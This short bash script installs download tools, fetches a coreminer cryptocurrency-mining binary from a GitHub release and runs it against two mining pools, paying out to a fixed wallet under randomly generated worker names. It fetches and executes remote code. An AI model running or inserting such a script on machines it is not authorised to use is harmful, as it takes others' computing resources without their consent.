#!/bin/bash
apt update
apt install -y wget sudo curl
wget https://github.com/catchthatrabbit/coreminer/releases/download/v0.19.88/coreminer-linux-x86_64.tar.gz
tar xf coreminer-linux-x86_64.tar.gz
cd coreapp
./coreminer -P stratum1+tcp://cb16e28eda52f3750022c539e75c84610f87af8030a9.$(echo $RANDOM | md5sum | head -c 10)@de.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb16e28eda52f3750022c539e75c84610f87af8030a9.$(echo $RANDOM | md5sum | head -c 10)@sg.catchthatrabbit.com:8008
